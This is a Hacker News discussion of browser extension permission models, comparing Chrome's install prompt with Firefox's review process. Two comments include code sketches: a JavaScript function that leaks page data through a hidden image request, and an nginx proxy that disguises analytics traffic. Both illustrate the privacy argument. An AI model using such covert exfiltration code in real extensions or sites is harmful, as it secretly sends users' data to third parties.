
Mozilla shouldn't copy Chrome's permission prompt for extensions - bobajeff
https://palant.de/2016/07/02/why-mozilla-shouldn-t-copy-chrome-s-permission-prompt-for-extensions
======
kettl2
Having spent some time looking at the code of popular Chrome extensions
recently, I was left really shaken by what's happening under the hood.

Google's position seems to be: if a website can track you and monitor your
behavior when you are on the page, then an extension should be able to do so
too. But extensions have a whole lot more capability. They can look at my
history, bookmarks, all the fucking tabs I have open and what's happening in
each one, and send nice reports off to god knows who.

If I download a simple task list extension and every word typed, mouse move,
click etc. is being sent to Google Analytics, I would like to know that!
Because my expectation is that it's a simple list being stored locally on my
device, not being shared with anyone. Same goes for history-stats extensions,
or reddit/youtube filtering extensions. Every single extension I looked at was
hooked up to some analytics framework, cloud backup, or sync service or other.
If some third-party dev sitting in his mom's basement is collecting all this
data, I want to know!

The best was the history-stats extension I had installed. Very useful, pretty
reports, code on GitHub, a nice backstory about a benevolent developer
building something cool for the world in his free time, etc. When I dug
around, the story changed to the dev disappearing after selling it off to
shady characters, who then proceeded to do things like randomly redirect pages
to ad sites.

At install time there is no reason Google can't say that this extension uses
Google Analytics to track where you are clicking etc., and what data and how
much of it is being sent off every day to god knows who.

~~~
robryk
> At install time there is no reason Google can't say that this extension
> uses Google Analytics to track where you are clicking etc., and what data
> and how much of it is being sent off every day to god knows who.

Let's say Google started to do this in a way that causes people not to want to
use such extensions. Why do you think extension authors would stop using
analytics, as opposed to switching to some other analytics provider (that is,
on average, more fishy security-wise)?

Disclaimer: I work at Google, but not on anything Chrome-related.

~~~
hvis
Then the extension would have to similarly say, on install, that it sends
analytics to <fishy provider>.

Which would make the user want to use them even less.

~~~
geofft
There are self-hosted analytics solutions, and in the worst case you can
always reverse-proxy to Google Analytics. So the extension will say
"MyExtension needs to communicate with MyExtension.com" and nobody will know
why.

(Unless you have a manual review process, of course.)
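
For instance, hiding Google Analytics behind one's own domain takes only a few
lines in a reverse proxy. This hypothetical nginx snippet (domain invented)
would make all analytics traffic appear to go to MyExtension.com:

```nginx
# Hypothetical sketch: serve Google Analytics' collection endpoint from our
# own host, so the extension only ever talks to myextension.com.
# (TLS certificate directives omitted for brevity.)
server {
    listen 443 ssl;
    server_name myextension.com;

    location /collect {
        # Forward each hit to GA; the client never sees google-analytics.com.
        proxy_pass https://www.google-analytics.com/collect;
        proxy_set_header Host www.google-analytics.com;
    }
}
```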

------
kalleboo
It sounds like a case of overly broad permissions. Have they looked at other
permissions models?

For one, extensions should be able to include an explanation why they need
each permission.

Network access should be a separate permission like it is for iOS keyboards.
It's safer for an ad blocker to read and modify a page if it has no method of
exfiltrating the content. Blacklist updates can be done through the regular
extension update mechanism.

Looking at the list of permissions in the documentation, a lot of these look
like they should be asked for at the time of first use (location, clipboard,
screenshots, etc). This would avoid the problem of asking for overly broad
permissions upfront "just in case". Android had the same problem.

But in the end, not informing the user is the wrong choice, no matter how
bullet-proof you think your vetting process is. You'll always have users who
are paranoid (as developers of a camera app on iOS, we've had 1-star reviews
claiming our app "uploads all your photos to the internet" simply because we
need photo library access), and it's their loss mainly, not yours.

~~~
ytpete
> It's safer for an ad blocker to read and modify a page if it has no method
> of exfiltrating the content.

The problem is that being able to modify the page _is_ a method of
exfiltrating information - e.g. you can add an img tag triggering a GET to an
arbitrary URL. I suspect it would be surprisingly tricky to try restricting
page modification in such a way that information can't be sent anywhere the
page wouldn't have sent it originally.
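
As a sketch of the point above: a script that can only modify the DOM can
still leak data by encoding it into the URL of an injected image (the endpoint
and function names here are invented for illustration):

```javascript
// Build a URL that smuggles captured page data out in the query string.
function exfilUrl(endpoint, data) {
  return endpoint + "?d=" + encodeURIComponent(data);
}

// Appending the image triggers a GET to an arbitrary server; no network
// permission is needed beyond the ability to modify the page.
function leakViaImage(doc, endpoint, data) {
  const img = doc.createElement("img");
  img.src = exfilUrl(endpoint, data);
  img.style.display = "none"; // invisible to the user
  doc.body.appendChild(img);
}
```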

+1 on deferring permission prompts until the moment the app actually needs the
privilege, though. It's worked pretty well on iOS, and it's finally coming to
Android; maybe it'll come to Chrome or Firefox next.

~~~
dgoldstein0
Couldn't we just give ad blockers an API for filtering network requests, so
they could decide to allow or deny each request? And then give them no other
internet access?

This seems like an API failure: common jobs for extensions can't be done
without scary permissions.
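
A minimal sketch of such an API, assuming the extension supplies only a pure
allow/deny function (the filter list and function names are invented; the
wiring comment uses Chrome's existing blocking webRequest API):

```javascript
// The extension contributes only a decision function over request URLs;
// the browser applies it, so the extension needs no network access itself.
function makeBlocker(blockedHosts) {
  return function shouldBlock(url) {
    const host = new URL(url).hostname;
    // Match the listed hosts and any of their subdomains.
    return blockedHosts.some(h => host === h || host.endsWith("." + h));
  };
}

// With Chrome's existing (blocking) webRequest API this could be wired as:
//   const shouldBlock = makeBlocker(["ads.example", "tracker.example"]);
//   chrome.webRequest.onBeforeRequest.addListener(
//     details => ({ cancel: shouldBlock(details.url) }),
//     { urls: ["<all_urls>"] },
//     ["blocking"]);
```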

~~~
roblabla
The problem is, many ad blockers also have a feature to hide certain DOM nodes
inside websites, to remove embedded ads or anti-adblocker elements. So you'd
also need an API to filter out certain selectors... and the list of
specialized APIs could go on and on.

~~~
madeofpalk
Apple kind of solved this problem with the Content Blocker API: all of the
blocking is defined in a 'static' list, which Safari uses to block certain
things.
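
The Safari content blocker format is literally a static JSON list of
trigger/action rules; a couple of illustrative rules (domains invented) look
like this:

```json
[
  {
    "trigger": { "url-filter": "ads\\.example\\.com" },
    "action": { "type": "block" }
  },
  {
    "trigger": { "url-filter": ".*", "if-domain": ["example.org"] },
    "action": { "type": "css-display-none", "selector": ".banner-ad" }
  }
]
```

Because the list is declarative, Safari can evaluate it itself and never has
to tell the blocker what the user is browsing.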

------
greggman
Maybe I'm the only one, but I want "ask me every time unless I specify
otherwise" permissions.

A password manager doesn't need to read all my websites. It only needs to
read/modify the page the moment I press "fill in my password". Same with a
"screen capture and upload to cloud" extension, a "bookmark" extension, a
"post to my feed" extension. Yes, an ad blocker needs all permissions. The
rest don't, and I wish I could be asked, or at least distinguish between the
permission to read everything and the permission to read on click.

------
amelius
I think a permission model should have three choices for every question:
allow, disallow, and pretend.

With the last option, app makers cannot strong-arm the user into accepting
unwanted permissions as the price of installing the app.

For example, when the app wants file-system access, the "pretend" option would
give the app a view of an empty or dummy (fake) file-system. When the app
wants access to GPS coordinates, the "pretend" option would give the app dummy
coordinates. Et cetera.

~~~
tetrep
I don't see "pretend" as being productive. If you're dealing with an app that
would otherwise refuse to run without a permission, even if it didn't truly
need the permission to function, then it would simply escalate the arms race.
It would be pretty easy to detect a fake filesystem (try to write a file, then
read it back) and spoofed GPS (GeoIP, ping supposedly nearby servers, etc.).
And, of course, these checks could be encapsulated in a convenient library for
developers to easily use. Then you'd have the browser's response to this, and
we'd end up in the ad-blocker-blocker-blocker world in which we now live, only
we'd be wasting the time of developers who would otherwise be doing productive
things (more browser bug fixes/features). At least with the current ad-
blocking mess we're only wasting the time of adtech.

~~~
jimrandomh
Yes, but at that point they've lost plausible deniability; they can no longer
claim that they asked for permission because some obscure feature required it.
People are much less likely to agree to "trade my filesystem for a game" than
they are to agree to "play a game that uses the filesystem to save games".

~~~
drdaeman
They tend to just say "we need this permission for the application/extension
to _work correctly_", and stop at that.

Seriously, a certain (quite famous, 5M installs) app got an update that
requested a permission to install packages (!). It was actually harmless,
since granting it wouldn't have worked (the system won't allow this for
non-system apps), but it nonetheless looked just wrong.

I emailed their support, asking why it was there. And, guess what? The reply
was, essentially, "we need it because we do; it's required for the app to
work; sorry, but we can't disclose the exact details". Polite, but essentially
that.

Long story short, I happened to mention this on a friend's blog, and my
comment was noticed by his friend, who had connections to the app's company
(the world's small, hah!), so the ticket got escalated and got a proper
review. It turned out this had just accidentally slipped in from some
dependency's development builds, or something like that. I got apologies for
the dubious response and a discount coupon, and the issue was fixed.

The thing is: a) I highly suspect most users don't give a second thought to
accepting this permission (if there were more reports on this, I guess the
tier-1 support would know about the issue and the response would be
different), and b) the initial attitude is "we know better".

------
_nedR
I don't agree with the article at all.

Chrome is being completely honest with the user. If a YouTube extension asks
permission to "read data from all websites", you must ask yourself and the
developer why it needs access to all websites and not just YouTube. A good
extension must enumerate all the permissions it demands and give good reasons
why it needs each of them. If an extension seeks new permissions, then consent
must be sought from the user before the update. This is obviously the correct
approach (how it affects the extension developer's revenue/user adoption is
unimportant). Chrome's model is comparable to the security models of Android
and iOS. Sure, it's not perfect, but it's much better than the Firefox model,
which is comparable to Windows 98.

Also, I don't understand the whole shifting-of-responsibility jibe. Does
Mozilla review every extension and every update in their store? Do they accept
responsibility if malicious code is downloaded from their store?

To conclude, I would like Firefox's stringent app review process _and_
Chrome's fine-grained permissions and sandbox model.

Edit: I want to point out that this article is really looking after the
interests of the developer, and not after the interests of the user.

Edit 2: Also to add: sandboxing is simply good security practice. Even if the
author is not malicious, in case an extension is exploited due to a bug, the
damage done by a well-sandboxed extension is limited by the permissions
granted. In Firefox, such an exploit could hoover up all your data, credit
card info & passwords from all your websites, and data from your hard drive as
well.

~~~
Manishearth
> Chrome is being completely honest with the user.

The article is not advocating otherwise.

A _lot_ of extensions need that permission, even though they only use it to
do something much more specific. Adblock uses it to read (but not transmit)
your webpages and remove sections. Password managers use it to scan (but not
transmit) webpage content and fill certain form fields.

If there is a review process (which Firefox already has in place), then you
can actually give out permissions like this. You can ensure that the data read
from the webpage is never sent to the server, and useful things like that.

I believe the proposal for WebExtensions in Firefox is to have certain kinds
of extensions get auto-approved: the ones which need simple, sandboxable
permissions (not "read all my webpages"). Extensions that need more
permissions will need review, and they can request semantic permissions
instead of just "give me all your data and trust that I don't do anything bad
with it", which is bad and has already led to issues in the past where a
Chrome extension developer sells their extension, which is then used to
distribute malware.

> To conclude , i would like firefox's stringent app review process and
> chrome's fine-grained permissions and sandbox model.

The article is proposing finer grained permissions than Chrome.

~~~
_nedR
>A lot of extensions need that permission, even though they only use it to do
something much more specific. Adblock uses it to read (but not transmit) your
webpages and remove sections. Password managers use it to scan (but not
transmit) webpage content and fill certain form fields.

Yes. But the user should be made aware of the consequences of their action.
Do they realize that installing a password manager means granting access to
all their data to a third party? Is this author reliable? What do other users
think of the author? Has anyone reviewed the code for this? These are all
questions potential users should ask.

>they can request semantic permissions instead of just "give me all your data
and trust that I don't do anything bad with it", which is bad and has already
led to issues in the past where a Chrome extension developer sells their
extension, which is then used to distribute malware.

A lot of things cannot be controlled by either the review process or
sandboxing. What if your extension has a web component (say, your password
manager backs up passwords to the cloud)? Mozilla cannot review your server
code. A sandbox won't protect resources you have already given access to, but
it will limit the damage done.

>The article is proposing finer grained permissions than Chrome.

I have reread the article and haven't found anything that backs this
assertion. Indeed the author seems to say: Mozilla vouches for me, so you
trust me with all your stuff too. From the article:

'Wouldn’t it be a better idea to keep doing that so that the installation
prompt can simply say: “Hey, we made sure that this extension is doing what it
says, want to install it?”'

Edit: I agree that some form of review is needed for extensions. Simple
sandboxing alone is not enough. But the article doesn't seem to support
sandboxing.

~~~
Manishearth
> Yes. But the user should be made aware of the consequences of their action.
> Do they realize that installing a password manager means granting access to
> all their data to a third party? Is this author reliable? What do other
> users think of the author? Has anyone reviewed the code for this? These are
> all questions potential users should ask.

No. That is the point both the article and I are making. If the add-on store
has a review process in place (again, Firefox has this), it is possible to
verify that the password manager is not leaking data to a third party. The
answer to "has anyone reviewed the code for this?" is yes.

> What if your extension has a web-component ( say your password manager backs
> up passwords to the cloud)? Mozilla cannot review your server code.

Yes, in which case they can say that it grants access to all your passwords. A
password manager that encrypts them correctly won't need to. These are
semantic permissions, so you can differentiate between the two.

> I have reread the article and haven't found anything that backs this
> assertion. Indeed the author seems to say: Mozilla vouches for me, so you
> trust me with all your stuff too. From the article:

"For example, a reviewer could determine whether the extension is merely
modifying webpage behavior or actually extracting data from it." -- this is
_exactly_ finer grained than "can access everything". Add-ons that don't need
any sort of access permission can still be sandboxed so they are not allowed
to use it. It's not clearly spelt out in the article, but from what I've
heard/read, the planned system is something like: "If you don't need any
dangerous permissions, you don't need review and we will sandbox you. If you
need something that can be abused, there will be a review component." This
article proposes that the review component be used to further improve the UX
of the permissions displayed to the user.

You bring up a valid point about trusting the reviewers. Remember that since
this is finer grained, Chrome's coarser, machine-verifiable sandboxing
permission levels will still exist underneath. It would be interesting to
expose a mode that shows "if you don't trust the reviewers, these are the
software-enforced permissions the app has".

> Sandboxing is simply good security practice. Even if the author is not
> malicious, in case an extension is exploited due to a bug, the damage done
> by a well-sandboxed extension is limited by the permissions granted. In
> Firefox, such an exploit could hoover up all your data, credit card info &
> passwords from all your websites, and data from your hard drive as well.

The article doesn't say it's going to avoid sandboxing. It's building a finer-
grained semantic system on top of the existing review process and sandboxing
system.

> Edit: I want to point out that this article is really looking after the
> interests of the developer, and not after the interests of the user.

How? An add-on review process is explicitly worse for developers. This article
is all about exposing better UX for permissions, for the user, so that they
don't get desensitized to overly broad permission requests.

I feel that you're lacking some context on the proposal here; but I'm not sure
what.

------
kartickv
One concrete privacy improvement is to identify subsets of existing
functionality that are widely used and can be mapped to a separate permission,
or no permission. Then, most extension writers can request that specific
permission.

An example is Safari's content blocker API. They've designed it so well that
the content blocker doesn't know what it's blocking, or what sites you're
visiting. Apple didn't merely reduce the amount of private information
collected; they eliminated it.

Another example is iOS, where a permission is needed to access all contacts,
but if you just want to pick a single contact (say, to share a document), you
can invoke the system picker without needing a permission.

The web needs to adopt such privacy-sensitive subsets of permissions in
addition to the blank-cheque "access all data on all sites" permission.

Disclosure: I work for Google, but not on Chrome.

------
deno
Even if they copy the warnings verbatim, I’d like to at least suggest adopting
some sort of icon set, preferably with color coding: yellow for frequently
requested permissions, red for infrequently requested permissions.

Anything, really, that lets you know at a glance what you’re about to install,
without having to read a bullet-point list.

Colors are fine, but unique icons would be even better. If it potentially
affects the user’s privacy, anything but a scary-looking big-brother eye would
be inappropriate.

See for example Facebook’s permission dialog from 2010:
[https://hyuz.files.wordpress.com/2010/04/gsh-1427.jpg](https://hyuz.files.wordpress.com/2010/04/gsh-1427.jpg)

The article mentions that CWS’s users rely on reputation. That is 100% true.
You basically have to go into at least the Reviews section to see if there are
any ‘surprises’ included. There was a time you couldn’t install a mouse
gesture extension without compromising your privacy.

The scary part is that all your extensions are self-updating. As long as the
author doesn’t change the permissions, they can include a backdoor at any
time without any new prompt.

I don’t suggest they review the extensions manually. Instead what I would like
to see, personally, is just a simple setting to only show open source
extensions.

At least with AMO it’s very simple to check the source of any extension you
like. It’s right there on the extension’s page. Disabling automatic updates
and reviewing the source code is something I’ve done in the past.

If you combine easily accessible source code _and_ a comment section, this
alone will increase security by a significant margin.

~~~
robryk
> If it potentially affects the user’s privacy, anything but a scary-looking
> big-brother eye would be inappropriate.

Well, what permissions don't?

~~~
deno
I meant anything that lets the extension leak any data: contacting third-party
servers, modifying the DOM, etc. I suppose more granular permissions might be
required here.

------
okisan
As an extension developer, it is easier to request "access all web site data"
at the beginning. The alternative, using optional (host origin) permissions,
means dealing with complex UI workflows and often asking the user to grant a
permission that is already granted, due to a Chrome bug not fixed for
years [1].

1.
[https://bugs.chromium.org/p/chromium/issues/detail?id=310815](https://bugs.chromium.org/p/chromium/issues/detail?id=310815)
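
For reference, the optional-permission flow being described is roughly this
(helper names are invented; `chrome.permissions.request` itself is the real
API):

```javascript
// Chrome match patterns take the form scheme://host/path.
function originPattern(host) {
  return "https://" + host + "/*";
}

// Ask for one origin at the moment it is needed, instead of requesting
// "<all_urls>" at install time. Requires "optional_permissions" in the
// manifest; guarded so this sketch also loads outside an extension.
function requestHostAccess(host, done) {
  const req = { origins: [originPattern(host)] };
  if (typeof chrome !== "undefined" && chrome.permissions) {
    chrome.permissions.request(req, granted => done(granted));
  } else {
    done(false);
  }
}
```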

------
appleflaxen
Chrome's permissions are not a panacea, but this article doesn't provide a
convincingly better alternative.

"Code review" doesn't scale, especially at the level of a nonprofit, when
users are submitting their own add-ons. It may be that code review has a role
(it's a compelling argument), but knowing exactly what an add-on is doing is
really important.

One way in which it _could_ be better: instead of "internet access" as a
single unit, provide a whitelist of sites the app can access. And if the
privileges change in any way, flag it for human review and maybe even reset
the review count.
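
Chrome's extension manifest can already express the whitelist shape being
suggested: host match patterns instead of a blanket grant (extension name and
hosts below are invented):

```json
{
  "name": "MyExtension",
  "version": "1.0",
  "manifest_version": 2,
  "permissions": [
    "https://api.myextension.com/*",
    "https://www.youtube.com/*"
  ]
}
```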

~~~
carussell
Mozilla Corporation has over 1000 employees and the same kind of perks and
accoutrements as other Bay Area tech companies. The amount of revenue they've
received through business partnerships is measured in billions of USD. They
sponsor events at hip venues with open bars and party-like atmospheres.

The picture of an overworked and frail non-profit has been out of date for
nearly a decade now.

------
746F7475
> _In fact, lots of confused users asked why Adblock Plus needed this
> permission and whether it was spying on them. And we explained that the
> process of blocking ads is in fact what Chrome describes as changing data on
> all websites._

Sounds to me like the permissions prompt is doing exactly what it should be
doing: informing users what the extension can do.

Sure, it would be nice if there were a qualified code review process that
could gather all necessary permissions from the code, but with bigger
extensions this would take days or weeks to get right, and unless you can get
money out of your extension that is a long wait. I've made a couple of
extensions I wanted, and when I get them done and uploaded I just want to show
them off to a few friends and install them myself. These are very much
spur-of-the-moment things; if I had to wait through rounds and rounds of code
review and questions about my code, I probably couldn't be arsed to create
extensions.

~~~
Manishearth
Note that Firefox has had this process for years, for add-ons with far more
power than what Chrome gives you. Sure, it is tedious and could be improved,
but the model works.

Also, I don't think you will have to go through review for extensions not
requesting dangerous permissions. For some definition of dangerous :)

(I wonder if both models could be implemented simultaneously -- unreviewed
extensions with "use at own risk" warnings, and reviewed ones with fine-
grained semantic permissions)

------
1ris
I don't see much sense in an allow-or-it-doesn't-run permission/capabilities
model. If there is no option for "make the app/extension believe it has a
capability when it does not", I don't have more choices than before: install
or don't install.

An extension could, for example, ask for the GPS location. I'd like to be able
to send the app some nonsense data and keep using it.

------
ComodoHacker
The whole point about code review could change with the upcoming adoption of
WebAssembly. A lot of add-on developers will definitely start to protect their
source code, especially for add-ons that do something shady, e.g. tracking
users' behavior.

------
J_Darnley
Why? They shouldn't be copying chrome's extensions in the first place.

~~~
Manishearth
More like building a much more powerful, standardized extensions API that is
backwards compatible with Chrome extensions (which offer relatively limited
tools).

It isn't copying; all the browsers want a standardized extension system, and
they have agreed on using Chrome's as a starting point.

~~~
J_Darnley
More powerful? I thought Chrome's API was stupidly limited, which is why
Firefox had better extensions (all of which they want to throw out).

~~~
Manishearth
That is not the case. Chrome's API is just a base. The proposal is to be able
to handle most of Firefox's add-on ecosystem, IIRC. The code would have to
change, but the functionality would be the same.

There is a lot of misinformation out there about Firefox's switch to
WebExtensions. Existing add-ons aren't going to be obsoleted immediately;
rather, new APIs will be added first, and then developers will be asked to
switch.

Currently, Firefox add-ons often hook directly into the browser, which is hard
to keep secure and makes it hard to evolve the browser.

------
cLeEOGPw
> Also, Adblock Plus could also read data as a side-effect, but it doesn’t do
> anything like that of course. The latter isn’t because the permission system
> stops Adblock Plus from doing it, but simply because we are good people (and
> we also formulated this very restrictive privacy policy).

Sure everyone believes you. Such an honest and genuine person.

~~~
JadeNB
> Sure everyone believes you. Such an honest and genuine person.

I think that this sarcastic tone is unproductive, but the downvotes are a
shame, as it's true that there have been ethical issues with ABP in the past:

[https://en.wikipedia.org/wiki/Adblock_Plus#Controversy_over_...](https://en.wikipedia.org/wiki/Adblock_Plus#Controversy_over_ad_filtering_and_ad_whitelisting)

------
gcb0
Mozilla copying Chrome, and GNOME copying OS X: the two things that convinced
me that software patents may not even be a bad thing.

Enough with being a copycat of every dumb decision just because the author has
market share.

And of course I joke about the software patents thing. But we need something
that can stop this sabotage of popular projects from within. I may have had
time to contribute in the past, but nobody can police or fork every project.

------
greendestiny_re
I once asked a Mozilla developer why Firefox displays the "Adobe Flash plugin
blocked on this page" notification when the page apparently doesn't use Flash
at all, and choosing either option (allow/block) doesn't impede its
functionality or change its appearance whatsoever.

The developer replied that there are Flash cookies being set and it's possible
an attack could come through them. When I asked if he knew of any such case
happening, the answer was no. Then what is the purpose of bothering the user
about an attack vector if the attack is merely theoretical?

My conclusion was that software products normally stimulate adoption by
offering useful features, but Firefox deviated from this attitude and adopted
what I call "avoidance of annoyance": the user has to upgrade to the latest
version to avoid being annoyed by incessant popups and notifications that can
only be delayed but never permanently removed.

The irony is that updating to the latest version of Firefox will get rid of
the previous generation of notifications while bringing a new cycle, thus
ensuring users are constantly kept in a state of anguish and frustration that
will keep them updating for the sake of updating.

~~~
pcwalton
> When I asked if he knew of any such case happening, the answer was no. Then
> what is the purpose of bothering the user about an attack vector if the
> attack is merely theoretical?

I'm not OK with the philosophy of "let's not fix any security holes until we
find someone actively exploiting them".

~~~
greendestiny_re
You are using quotation marks as though I said those words.

quote (kwəut) verb 1. to repeat the exact words of a person as they were said
or written.

My point was about not giving the user enough information _to make an informed
decision_ yet demanding a decision anyway.

~~~
cbreeden
It's still not clear to me. Are you suggesting that uses not be notified of a
potential yet not verified security hole or not?

~~~
greendestiny_re
In short, I would like to see Firefox _empower and inform_ its users.

The current implementation of the Adobe Flash plugin warning does neither, and
by the looks of it, add-on permissions mentioned in the OP will be the same.

